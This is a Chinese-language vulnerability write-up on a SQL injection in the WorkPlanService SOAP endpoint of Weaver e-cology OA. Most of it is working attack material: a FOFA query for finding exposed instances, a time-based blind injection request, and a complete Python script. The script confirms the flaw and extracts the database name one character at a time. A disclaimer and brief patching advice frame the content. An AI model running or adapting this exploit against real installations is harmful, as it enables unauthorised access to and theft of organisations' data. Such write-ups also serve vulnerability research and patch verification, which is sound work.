泛微WorkPlanService接口存在SQL注入

0x00、声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用，请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。

---

中华人民共和国网络安全法

第二十七条 规定

任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

---

0x01、产品概述

泛微e-cology依托全新的设计理念,全新的管理思想，为中大型组织创建全新的高效协同办公环境。标准化产品+个性化开发，适合集团型组织OA软件

0x02、漏洞描述：

泛微e-cology平台 WorkPlanService接口存在SQL注入。

0x03、资产测绘

FOFA：app="泛微-EOffice"||app="泛微-OA（e-cology）"

0x04、漏洞复现

4.1、数据包测试

1、POST请求包

POST /services/WorkPlanService HTTP/1.1
HOST: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
    <soapenv:Header/>
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(select 111 from (select sleep(5))aaaa)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>

测试截图：

4.2、py脚本

探测是否存在漏洞并遍历出其数据库名

# -*- coding: utf-8 -*-
import time
import sys
import requests
# 禁用不安全请求的警告
requests.packages.urllib3.disable_warnings()
headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165',
        'Content-Type': 'text/xml;charset=UTF-8'

}
def len_(url0,sql_0):
    len_l = 0
    for len in range(1,20):
        try:
            data = f'''<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(select 111 from (select (if({len}=(select length({sql_0})),sleep(3),1)))aaaa)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>'''
            s = time.time()
            req = requests.post(data=data,url=url0,headers=headers,timeout=20)
            e = time.time()
            if e-s>3 and e-s<4:
                len_l = len
                print(f"the len({sql_0}) is :  ",len)
                return len_l
        except requests.exceptions.RequestException as e1:
            print("An error occurred:", e1)   
    if len_l==0:
        print("no result!!!maybe have error!!") 
        sys.exit()
def name_(url0,len_l,sql_0):
    nm_chr = []
    for i in range(len_l+1):
        for nm_asc in range(64,127):
            try:
                data = f'''<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(select 111 from (select (if({nm_asc}=(select ascii(substring({sql_0},{i},1))),sleep(3),1)))aaaa)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>
'''
                s = time.time()
                req = requests.post(data=data,url=url0,headers=headers,timeout=20)
                e = time.time()
                if e-s>3 and e-s<4:
                    print(f"on the {i} is:",chr(nm_asc))
                    nm_chr.append(chr(nm_asc))
                    break
            except requests.exceptions.RequestException as e1:
                print("An error occurred:", e1)   
    if len(nm_chr)!=len_l:
        print(f"find name fail or have error!!!! please check  !!!")   
        sys.exit()
    print("find the name is:",''.join(nm_chr))

def vuln_t(url):
  data = '''<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(select 111 from (select (if(1=1,sleep(3),1)))aaaa)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>
'''
  try:
    s =time.time()
    rep = requests.post(data=data,url=url,headers=headers,timeout=20)
    ed = time.time()
    if ed-s>3 and ed-s<5:
        print(f"find {url} exists vuln!!!")
        return 1
  except requests.exceptions.RequestException as e1:
                print("An error occurred:", e1) 
  print("maybe no vuln!!") 
  return 0  

if __name__ == "__main__":
    url = "https://127.0.0.1"
    url0 = f"{url}/services/WorkPlanService"
    if vuln_t(url0):
        sql_0 = "schema()"
        name_(url0,len_(url0,sql_0),sql_0)
    print("complete!!!")

0x05、修复建议

临时缓解方案

使用预编译语句，绑定变量；输入验证和过滤；使用防护设备进行防护。如非必要，不要将受影响系统放置在公网上。

升级修复方案

官方已发布新版本修复漏洞，建议尽快访问官网或联系官方售后支持获取版本升级安装包或补丁。